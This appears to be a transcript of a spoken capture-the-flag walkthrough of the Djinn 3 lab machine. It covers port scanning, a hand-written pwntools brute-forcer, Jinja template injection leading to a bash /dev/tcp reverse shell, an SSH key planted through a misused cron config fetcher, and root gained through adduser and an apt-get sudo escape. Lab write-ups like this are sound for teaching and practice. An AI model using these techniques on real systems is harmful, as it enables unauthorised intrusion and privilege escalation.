Hey, what's up everybody? Today I'm gonna be showcasing this one box, the Djinn. This is the number 3. I really like the box. I think it's pretty interesting. We will be touching a bit of Python script, and I've already ran a map scan. Um, so I used TagPN. Disregard this. TagPN to tell Nmap the host is already up and running. SVC to run a surface version detection scan, plus the C means basically tells Nmap to run some default scripts to each of those. Tag N to disable DNS resolution, that will make it faster. Tag V to make it verbose, and tag T5 in order to make it faster, basically. So yes, there you go. We have OpenSSH 7.6p1 on Ubuntu. We have HTTP Lite PPD. I mean, it's Lite TPD. It's like a wordplay, right? Lite HTTPD and all the stuff. On port 80. On port 5000, we have Worksuit HTTPD. This is a Python web server, and we have another one which is 31,337, and it shows elite. However, one of the default scripts got this, like file.tickserve tickets.py, which is interesting. What else? Input username, then username. I mean, apparently it's looking for username, probably a password as well, so login or something like that. But well, let's start off by taking a look at the web page, right? So first off, I like to start with something like this. Let me just break it down for you guys. So tag C to have a colored output, tag U to specify the URL. Let's go first with the 8000. Remember the hash, the $sign plus T means just a variable I've declared as a target to save my IP. This is the fuzz word to tell FFUF where you want to fuzz at. Tag W to specify a word list. I'm not gonna be using this, but medium, to medium, nope, to medium. There you go. From setlist, tag T. Let's use 200 threads, and tag IC. Ignore comments in case you have. But in this case, I've modified this list to just remove them. So there you go. So we can get going, and we have images. Let's see if we have something else. In the meantime, let's just blog about us. I don't see anything strange. Let me just Control U to see the page, the view. Oh, I mean to view the source code of the web page, and I don't see anything strange either. So cool. But let's read this just for just to do a little bit of OSINT, just to know what this is about. So it says highway, customize everything, custom Earth here in the title. That dash is weird. And it says, we are a new startup that believe in customization of everything, whether it's a text editor that you write code in, or a ticketing software that you use. It should be customized according to your needs. We will be helping our customer to get the best customization possible for them. Currently, our pricing is also very cheap. Just for a 52 USD, you can get your own customized software tools. Okay, interesting. And we didn't find anything here. This doesn't mean we can't find anything. Obviously, I recommend trying with some other lists. The lowercase might have some different words as well, and some raft from setlist as well. Like instead of directory, just here use raft and past some of them, right? Yeah, let's go. What was it? Directory? The hell? There's one. And T. And there you go. Let's go with the 5000. Nothing so far. And well, look at that. We have an index and it says this ticketing software is under development. If you find any issue, please report it to an admin. Okay, so again, I mean, this one is a big issue. It doesn't have any authorization or authentication system. I mean, this should be restrained. So yeah, let me just open them up to see more information and how the page looks like in there. Maybe we can scrape some information from here and Control U as always so we can see the source code. Maybe there's some kind of information leaked. We'll take advantage of that. And while it loads, let's read that because it says authentication to this ticket management system. I agree. We should add the support for authorization via passwords and also via user API key or token. I agree. Well, obviously it says sorry for the bright page, but since I have this extension, which is Dark Reader, and I am not seeing it in white, right? Sorry for your eyes. Cool. Second one, remove default user guest from the ticket creation service. Right, so cool. It looks like there's a guest user in there. And what else? Error while updating Postgres queries. So apparently it's using Postgres instead of MySQL. So maybe we can try here, for example, some kind of Postgres injection. As far as I know, this is not the way to root the machine. So we'll have that in mind. Anyway, and it says Jack will temporarily handling the REST limit UI. Okay, he has resigned. Cool. So at this point, what I'd like to do is start creating a user list. Just in case, you know. So we have Jack. What else do we have? Look at this. It's a request to help desk that since a lot of people were either fired or resigned, would be nice to have them to remove them. So maybe these accounts are still like active, so we can hack into them. And yes, that's it. What else? Complete the honeypot project. Small reminder, the deadline for the honeypot project is next week. Better finish that ASAP. Honeypot, that is interesting. That sounds pretty advanced for a machine like this one. So cool. And actually another one I like to get in there is the guest user, right? Guest user. So that's it for it. I think that's it for this board. Didn't find anything either. So what I like to do now is try to let me do this and grab the port. And let me save it into P. So I can sync to the IP and the port. There you go. And we have a username. So I don't know. Failed. Let's try something easy. Admin. Failed. I don't know. I mean, it could be whatever. So what I try now is to brute force this, right? Obviously, since this is a pretty custom service, there is no such exploit or something like that. Indeed, there's no elite that is like a common mark for some services. So I try to script one brute force tool in Python. So let's do that right now. Now let's call it bruteforcer.py. That name will work, right? And well, as always, let's try importing signal. This. What else? Let me import POM in order to play with some login bars and all the stuff. And let us begin, right? So in the Pythonic way, remember you have this. Like you want to initialize. Oh, I mispronounced that word. Sorry for that. Well, initialize, I guess. Your Python. I mean, this is not completely necessary, but it's just a Pythonic way to do it, right? So if name equals main, for that, then let's call main. Now main is not defined, so let's define it right now and call, for example, exploit, right? Well, now let's define exploit and all this stuff. This is like a staircase, right? Now, why do we want to do this? Because it's better organized than otherwise, right? So at this point, we want to play with signal just to handle our Control-C thing and be able to exit out of the program whenever we want. That's vital. So let's, first of all, let's define a function to handle it, right? So when handler is called, we're going to be printing something, right? Which is going to be, for example, exiting, right? And let's add a new one and let's exit effectively. So it says that exit and 0, which is the status code of Linux for successful exits. And now let's call it, right? So we can call it like signal.signal and signal.sigend, and then the function. Now the function obviously needs to receive 1, so we can call it sig from signal, or well, signal, just like that, and the frame, which is the function call itself. I mean, so cool, we have that handled. Now let's define, for example, this is another basic one. What happens when we don't specify a certain, I mean, the amount of arguments we want, huh? So we can do that like RGB. When the length of the RGB is different than 3, we're gonna say something. We're gonna use pawn here. We're gonna say log failure, and we're gonna be teaching the user how to use this tool, the usage. And I could add a, well, something like this, right? But that will be handled by the failure. The failure will add it automatically, and actually I can change it here, like log that failure. Let's do it like that. That's it. So usage, how's the usage? Well, you have Python 3, and then let me use f strings. So do this. So inside every curly bracket, we want to write an argument. So says RGB 0 at first. 0 will be the very first argument passed to Python, right? That will be essentially the very name of the program. That is bruteforcer.py. Now here, we're going to be using, well, actually, we will not be using it here, but we will specify it in, for example, username list and password list. That's the way we tell the user, hey, pass the user list and the password list itself in this order specifically. But this will be represented by sysRGB1 and sysRGB2, just like a list, right? Now, in the meantime, we will be, I mean, in order to do the brute forcer logic, it's actually kind of easy. I mean, we just need to use a for loop. But in the meantime, let's just go ahead and define the exploit logic itself, like what's gonna do, right? So let's do some variables first. Variables. Now let's define IP and port like this as the following. Remember, well, I mean, obviously we can set this like, I mean, yeah, let's do that. Like, instead of 3, let's use 4, and here, target and exploit. No. Yep, let me use string target, and a port. Let me specify it as well. So it's not 4 anymore, but 5. And let me call it here port. Well, it's not target. Remember, it says RGB 4. I mean 3. And here is going to be sys RGB 4. That's it. Because it's 0, 1, 2, 3, 4. That will be the port, right? So now we have some variables defined. Now we need to define the exploit logic, as we said. So we'll be receiving the username and the password, right? We can add it here too. So username, password. There you go. And here we just need to connect to the socket, right? So we can do that with well, the socket library, or even better with pawn itself. So we can define s as remote, which is a function that will allow us to connect to well, to connect to a socket and maintain the connection, right? We can pass IP, port, and well, since the program do something like this, now let me nano brute force her. Let me close it here. Let me open it here, and let me show you. So username, right? We need to wait until this appears to send a string, right? And when sent, we need to wait until the other one, which is password, appears in order to send another string. And then evaluate whether it says authentication failed or other thing. That's the logic, right? So, in order to express this with pawn, you just need to use something like s dot receive. I mean recv until, right? So wait until you receive this, which is username set, and then let's send it s dot send line, which is gonna be in binary. I mean in bytes, username. That's a variable, and it's not like that. Actually, yeah, no. Here you need to use this, but actually you need to encode this. So you use the variable username, which is ASCII basically, and you then use encode. That will effectively convert your ASCII string to byte string, right? So now we need to s receive until to receive password, so like that, and then we'll send s send line password that encode, basically, right? Now at this point, I like to save the response into a receive line, right? So response is my response is the response, basically. So we can now close the socket, right? Close it. Now we need to evaluate whether it says authentication fails or not. So we can do something like this. If B, because it's bytes, authentication failed, just like that. If it's not a response, then well, I'll return true, right? True, just like that. I'll return. Otherwise, well, it's false, and the function is ended, just like that. And down here, I like to do instead of that an if try. Sorry. So this says if exploit, that says if exploit is true, then do something. Otherwise, do nothing. So let's go. Let's start receiving our lists. Cool. Let's go with the usernames. So usernames is equal to open, and let's open, for example, sysrgv1, which is the username list, right? And let's open it in read mode. Cool. Well, let's do the same with passwords. Open sysrgv2. Let me remove this, and just like this, an R for read mode. Cool. Now, let's read line by line, right? So, user lines is going to be equal to usernames dot read lines. Cool. Let's do that with passwords as well. So, pass lines, let's call it like that, is going to be equal to passwords dot read lines, so like that. Now we need a way to remove the spaces from this list, because every time we get something like this, we'll have a list like the following. Let's say we're enumerating animals, right? So we have a list like this. Now we have a tiger, comma, cow, cat, right? Like that. So we need a way to strip them off, right? Let's do that. I researched that, how to do that in an efficient way, because imagine we're importing rockq.txt, that's like 14 million passwords. So we need the fastest way, no matter how long is the list we use, to have this working as fast as we can. So in order to do that, Stack Overflow told me this. For I and s in enumerate, which is a built-in function, user lines, this is something, right? Same thing here. Let me remove this. And let it go. For I, s in enumerate s lines, do something. What are you gonna do now? Well, you're gonna be saying, look, user lines index I is equal to s.strip. That's it. As easy as that. So, well, not user lines. Let me think about it. Oh yeah. And here it's s lines index I s.strip. Easy, right? So at this point, we can start like using for loops with the pass lines and the user lines variables. We can get this working, set the ball rolling. Let's do that. So we can, for password, I will have at first try some users, like 4 or 5 maybe, or maybe 100 passwords. So I do prefer to test each password for each user instead of the other way around, right? I'm going to be using for password in pass lines, do something, and for a for user, let me see, username in user lines, so like that, do something. What you're gonna do? This one. You're gonna be using p exploit, right? And in case this is true, you're going to be using something with bars. Now before this, let me declare a bar because I want to use p as log.progress and brute force, just like that. Let me give it a space, an extra space, right? And just like that. Cool. And right here for each password, you're going to be using a log.success f, and you're going to say valid. No, sorry, that will be down below. So p.status, we're going to be updating the status. You've trying with username and password, right? Cool. And here now, log.success f valid credentials found, username, password. There you go, and break it. Right. Well, actually, no, yeah, break it because at that point, you will have you will have already the password for username. So just break it and pass for the other user, right? Or the other password, basically. So and then if it breaks, then I'm gonna be p.status finished, just like that. And yes, I hope it works at first. Let us try it. So yeah, let's go. Got Python 3 brute forcer .py. Have you seen? I obviously already did this. So import, right? From pawn import, and it what it updated itself. Let's go with that. It says index out of range. Now why is it saying that? I mean, I know why, but this is supposed to do this. Like, yep, this. Let's exit out again, and that should work. Right, because it's not defined. Let me define it here. Since I'm not in Vim because it's kind of buggy these days, and my Kali, I have to fix it. I cannot like just copy it with YY and all this stuff. Let me just use this. I just testing. God. There you go. That works. Because it was defined before actually getting the values. So there you go. So usage, it's Python 3 brute forcer.py username list, which is gonna be cat users, right? So users, and I assure you, you can use Rockq and get the answer maybe slower. But in this case, we can use the same one. Okay. Again, the password is actually in Rockq, but this is the faster way to get it, right? So let's use stack t. Actually, let me use it here because I have the variables defined. So users stack t and stack p. Let's try it. What happened there? S remote and p import. Let's pass it in there then. Nano brute forcer, f exploit. So let's use IP port. Now let's pass it in here. So exploit call exploit with IP import, just like that. That should work now. And there you go. Now we see a lot of noise, and it looks like it worked. We have a valid credentials found. Now, in order to fix this, because that's the way remote works, we can actually set a level, L debugging level. So we can use this, and I think it was error. Yeah, I think so. Body in question marks, not question marks, like quotation marks, and that will get rid of it. Lock level must be an integer. Man, what's the matter? Remote IP port level. Oh, it's not errors, but error in singular. So cool. Let's go with that. And look at that. And valid credentials found, guest and guest. Cool. And I think it's amazing, actually. So and see, let's go with that and look at this and see, just like this. Let me use some guest and guest. And look at that, we're logged in. So let us use help as it says, and you'll see help, update, open, close. So I don't know, let me try update. You're not authorized. Then let me use open title. Okay, so we have this. Well, we have apparently ability to write a new ticket, and actually this is true, like tried and true. I mean, there was a default user guest from the ticket creation service, which is as well, right? So let's open up one, and well, first thing I like to try, and this is not because I already did the machine, as well as the actual thing I tried first, because this is a Python web server, was service-side template injection. I'm not gonna lie. Obviously, you can try to use some cross-site scripting, HTML injection, all the stuff. Feel free to try it yourself. But yeah, in this case, the let me switch over to my other network adapter. In this case, the vulnerability is in the server, the template engine part of the machine and all the stuff. So let me just look for them. Let me server side or SSTI, isn't it? Otherwise, just SSTI, payload, all the things, and that's it. I saw it. Server. Got server side temp. There you go. Template injection. So let's try to exploit that. Now, just to speed it up a bit, you have some Python in here, which is what we want. There are several template engines for Python. I'm not sure if they're here. Like, yeah, I'm not sure. I've seen it. Maybe in Hacktricks you can find it, but Jinja works most of the time. Now this is a basic injection. Let's try that, right? So title, and what else? Let me just switch back to my other network adapter. There you go, description. And let me see if it actually opens it. Oh, there you go. And apparently it doesn't work. It's not interpreting it. Obviously the desired answer is 4 times 4 16, 5 times 5 25. Let me go in link, and wow, look at that. 4 times 4 16. It actually got executed. So we may have some RC here, right? So that's fantastic, obviously, and we want to try here right now some code execution. like this one, for example. Here, this will work. So let me open again. Let's try this. Let's try that. Let me go back and check. And we have, well, it wasn't created, or yes, it was created. So cool. Let me open the link. And wow, look at that. We do have remote code execution. So that's cool. That's a good news. That's good news, right? For us. Bad news is for the client, of course. So why don't we try to grab our reverse shell right off the bat? Let us try with something like this. Let me call bimbash, and then c, and then bash, interactive mode, dev tcp 192.168.56.101 4444. Like this, and dot read and all this stuff. So let me copy it again and send it. Oh, what happened in there? What happened? Wrong choice of words. Oh, that's crazy. It didn't appear when I first tried it. It's nice to have it. So open, file, and description. Oh, I see what happened there. Cool. So let me add up a listener, and let's see if we can call a reverse shell. Okay, cool. So let me see. Up here. Link. There you go. Cool. Oh, cool. So we do have a reverse shell. Let me stabilize it via script fno bash and Ctrl Z stty raw minus echo, and for round, actually let me semicolon for round reset extern. Let me now export ter as extern in order to be able to do Ctrl C, Ctrl L, all the stuff, and we're here, right? So we can Ctrl C and Ctrl L. So we're here. Let me cat data JSON, and well, okay, it looks like the comments are actually being stored in a JSON file, which is weird. Let me cat webapp.py out, and it's, look at this, it's returning render template string, which with template, and the variable template must be, well, all this stuff. Look at that, the data itself, right? Cool. Let me check. Well, we have a secret key, hack the Djinn planet. Maybe that's a password we can reuse. Let's start a new rating. Like this, and we have Saint Jack MZFR. Cool. So let me try that. Saint. Looks like it's not. So Jack. Looks like it isn't. So MCFR. Nope. Nothing. So we have a web, and actually it has a dot, a leading dot, which is not normal. For a, I mean, it's hidden, right? Why would it be hidden? And we have something like this. So we have web ticket surf. I remember we saw this on Nmap. And sincere python38.pyc. I mean, this is Python cache files, right? And are from Saint. and it's interesting, at least. So let us go to ticksurf. Let's enumerate this. And we have a tickets.py. And it looks like this is the actual file we brute forced. Output, not the file, but the program, the binary, which is not the service. That's a better word. Look at this. I mean, it's using a authentication system by comparing strings. If username is guessed and password is guessed, returns true, otherwise false, which is a very poor programming practice. So let me see ticket.sh, and cool. This is just a shell script to initialize the tickets.py file. Cool. So at this point I decided to enumerate all the machine because at first I saw these files but didn't know what to do with them. I mean, I've always seen PyCache files in userlib and Python libraries, directories, and all the stuff. For example, with limpis, you can know them. And after a few minutes, I decided to look it up on Google, and I looked something like this. In case you didn't know how to do this, you can just start looking for, is there a way to read Python cache files .pyc? Well, you can start digging, right? And there's a read Python cache files .pyc. Again, just dig it. Just dig. Try to always change the words you use for your searches. And recover, maybe. I'm actually trying to find the blog I used. Okay, finding secrets by decompiling Python bytecode. Let me use that word. Decompile. And why I thought of decompiling, because when you, let me go back, this is a headache. When you add them out, you will see that they look like a binary. And this is actually some useful script. So main function cron job is gonna make my work easy peasy. And we'll call in some modules. Now let me cat the other one. Add that configuration. Oh, look at that. The config file, please use proper JSON load. I don't know what. Saint everything JSONs, temp everything JSONs. Well, all the stuff. So yes. Let me see if we have some answering here. And look at this. Okay, so it's using uncompiled 6 secrets. I mean, now that the variable name and string are reproduced in their entirety, further, it turns out that Python bytecode often contains enough information to recover the original structure of the code. That's cool. Tools like uncompile6 can translate that PYC files back into their original forms. That's what we want. Now you can install like Python 3C or pip. I mean, let's say just straight up like pip install uncompile6, I think it is. It's not here. So let me exit, whatever. Here. Pip install uncompile 6. And as you can see, I've already installed it. So we have uncompile 6, and we can pass it a file, right? So now we want to get those files. Now let me see if I have Python and Python 3. Cool. So let me do this, Python 3 and HTTP server. We have that. Let me go to content and wget this 8000 / dot configuration pyc. Let's get it. And now let's get the other one, which is synchronizer. And let's configuration minus the dot. Now let's move dot to dot minus the dot. Easy way to do that. And we have that. So again, cat syncer. We won't have anything. And actually the terminal corrupts. So let me just reset. There you go. And what about if we try uncompile 6 and syncer? Well, we see information. I want to save it in this very file. Do I have it? Nope. How can I save it? Cache it out. No. Well, let's use just T2 syncer .py, just like that. Cool. Let's uncompile 6 with configuration. Now let's tee it out to configuration.py. That's super cool. I didn't know of this tool until I did the machine, so definitely good learning. Let me just less the syncer. And look at that. So we have main cron job. It's gonna make my work easy peasy. If HTTP is a switch, I don't understand this. Let me check the other one. Maybe we have some other hints. Oh, look at this. I have super interesting information. We have static method. We have a static method. This is setting a config path, and it's using files. It will be everything ended at JSON on Saint, which I presume we don't have access to. Nope, we don't. And team JSON, which we do, obviously. What else over here? Config values. It's loading config values from the JSON, from some JSON files over tab and home/saint. Cool. And it's using something interesting here. If there are more than 2 files, then do that. Then otherwise use the path base name and split it on every dot, basically. And what is this? -2. I mean, if the very first, I think, element in the list divided by dots is equal to config, and if file2 is equal to config as well, then use a dt strip time files10 and use a format like day, month, year, which is interesting. So what I try to do now, and obviously you will not figure this out at first, you need to do some code analysis. An advice it worked for me would be to open up in your terminal your Python 3 console and start emulating this files, like what does this function does, what does this one does, all the stuff, right? So I'll go to temp Okay, I'll go to temp directory and I'm gonna be creating, do we have nano? Yes, nano, something like this, a day, whatever, a month, whatever, and a year, 2022. .config.json, I'm gonna be doing that. Enter, and I'm gonna be creating a JSON file, obviously, because as you can see here, this is something interesting. So config path, config reader, set config path. That was the very same variable, not function we were discussing earlier, right? So connection, it's checker config, and it says if FTP in connections, I don't know, FTP con. If SSH, then SSH con. But what about if it's URL in connections, then sync config URL config output? And that made me think of, so maybe this gonna perform a GET request to the URL passed, and that is getting an output key, well, to output the contents too, right? Pretty basic. So what I like to do is create a JSON. I'm going to be creating a URL. Let me go with HTTP 192.168.56.101.8000. Actually, just like that. And let me go with whatever. Then I'm going to be creating output like this, output. And I don't know, let's try temp output, whatever. And just like that, right? So I'm going to be using whatever, literally whatever. Now let me use a HTTP server over port 80. Now let's just wait. I like to do something like LSL whatever. So watch in every second, do something like this. Now, it doesn't exist, whatever, right? So we will test if this works. We'll wait and see if we can get a GET request. Alright guys, so I just modified it a bit because I noticed it was malformed. I just enclosed these values into quotation marks. Obviously, that's the way JSON works. There you go. We have a GET request. So and we have an output file. So output, and it says literally whatever. So now we know we have this kind of information, right? What can we do with this? There are several things. Since this is running a saint, what I like to try now is to, well, I mean, we need to get access to something, right? That's the way to escalate privileges. What I thought is we could create a pair of SSH keys and enter our public key into their, saint's authorized keys file so that we can grant access ourselves. So let's do that. Now we can create an SSH directory, go into it, and pwd xclip cell clip. That's because, let me actually remove that space, like that, and from here SSH key Djinn trsa b 4096 to make it stronger, and let's save it in here as id underscore rca. No passphrase, that's fine. And look at that. So we can id rsa that pop just like that. Now we can nano what was the name? Nano 12 And instead of whatever, let's use id rsa.pop and output us home paint authorized keys. There you go. We should have access soon. So let me again have my server running, and once I get the get request, then I'll try to SSH myself into Saint's account. All right. There you go. You have an ID RSA request. Let's go to Saint, then there you go. We're logged in. Cool. So let me try sudo tag and look at that. That's interesting. I can execute as root at user, but I cannot execute at user and asterisk in sudo just to make a root user and admin. So that's a tough call because I can create users, but not a super user. So how can I escalate my privileges? Well, it turns out there's a flag for the odd user binary, which we can use. Here, you can use sudo odd user. Let's create, for example, pentester, but let's assign it a group ID like that as root. Okay. So with that said, let me just pentester again, and tester, full name, room number, work phone. Yes, correct. And there you go. So now if we go to pentester, and it's pentester as well, well, sudo tag l, pentester, nothing. But we have root as group ID. Right now at this point, you like to do something like this. Group root and perm group equals read at least. Then you want to find execute and what was the other one? And write, or all of them, right? Whatever you want. In this case, I want to read some files just to check them out. And I'm going to be using exec, and I'm going to be executing ls l like this, and escaping the semicolon at the end, and just redirecting it to def null double l. Now there will be a lot of files, right? That's why it takes a lot to load up. And then let us see if it shows something back. Well, it's super slow. So yeah. Let me find, for example, from etc. I don't know if it's 0. Nope. Find, let's remove this one. Perm group read. That should work. I mean, how come not? No. Cool. On group root. Just like this. Maybe the perm is the hell. I'm not really sure what's going on here. Maybe the exec. Yeah, there you go. I don't know what I'm doing bad. Yep, maybe this. Nope. Well, anyways, let's just go with that. And obviously, again, there's a lot of files. Just look at that. But this is just a method in case you didn't come up with this idea of reading this one file. So once you do this, obviously you can play with a wipeout. For example, like when I don't want to see kernel or app armor or whatever, or VMware. So let us see. Let me use egrep. There you go. So you can start looking for files like that, right? So the file we want to see is etc suitors, right? I think you eventually come up with it. So yeah, that's it. And look at this. We have a saint. That's what we were seeing. And we have JSON, huh? And apparently JSON is able to execute apt/-get. Now JSON, as far as I remember, doesn't exist on the machine. And look at that. Actually, we can exfiltrate shadow. Oh, we can. Interesting. Password, passwd, sorry. And grep for JSON. No, it doesn't exist. So what about we creating JSON? I mean, the suitors file at the end of the day is a static file. It's not dynamically updated and created. Let's say you created a user, you gave it permissions, and you deleted a user a month after, sorry. The user is still in the suitors file. So if we can create a JSON user, we can execute commands as him. Right, so let's go back to saint. Now let's sudo user, just like that. There you go. Let's go with JSON. Now let's keep the GID 0. I mean, we can. Let's not, just for demonstration purposes. Let's use the same password as the name, JSON. Correct. So JSON, and there you go. If we use sudo tag ll, and JSON, look at that. apt/get. That is super amazing, right? Now we can go back and go to get the factout bands and start looking for this binary. And look at that, we have a way to escape out of this. Now for sudo, we have several ways to do that. Let's try this. For example, this is a pretty basic one, the most basic one way to escape. Let's try it. And it's trying to fetch actually some oh, what happened there? Let me just like that. Yeah, it's trying to fetch some information, which is weird. We can try this. It's a little bit longer. Let me try this. Sudo apt-get update apt update and pre-invoke, and this is important because this is saying just before invoking this, like before fetching data, execute bin bash or bin sh, and there you go, we're root. If we go to root, then we can, let me proof sh. Well, let me bin bash and cat proof, and look at that, cool. Actually, let me execute like proof sh. Amazing. Djinn 3 pond proof path with my root, special thanks, whatever. So yes, folks, that's all for today. I hope you guys liked it. I definitely learned something new with this box. I think that's amazing and invaluable. So I really hope you enjoyed it just as me. And I'll see you later. Thank you.